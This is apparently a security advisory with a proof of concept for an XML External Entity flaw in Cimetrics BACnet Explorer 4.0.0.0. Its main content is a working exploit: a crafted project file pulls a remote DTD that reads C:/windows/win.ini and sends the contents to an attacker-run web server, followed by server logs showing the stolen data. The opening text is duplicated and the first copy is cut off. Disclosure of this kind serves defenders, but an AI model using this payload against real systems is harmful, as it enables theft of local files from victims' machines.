### Summary The BACnet Explorer is a BACnet client application that helps auto discover BACnet devices. ### Description BACnetExplorer suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project file. ### Vendor Cimetrics, Inc. - https://www.cimetrics.com ### Affected Version 4.0.0.0 ### Tested On * Microsoft Windows 7 Professional SP1 (EN) * Microsoft Windows 7 Ultimate SP1 (EN) ### PoC Open file evil.xml: ``` <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE zsl [ <!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml"> %remote; %root; %oob;]> ``` xxe.xml on the web server: ``` <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> "> ```...
### Summary The BACnet Explorer is a BACnet client application that helps auto discover BACnet devices. ### Description BACnetExplorer suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project file. ### Vendor Cimetrics, Inc. - https://www.cimetrics.com ### Affected Version 4.0.0.0 ### Tested On * Microsoft Windows 7 Professional SP1 (EN) * Microsoft Windows 7 Ultimate SP1 (EN) ### PoC Open file evil.xml: ``` <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE zsl [ <!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml"> %remote; %root; %oob;]> ``` xxe.xml on the web server: ``` <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> "> ``` `python -m SimpleHTTPServer 8080` ``` lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 - lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 - ```
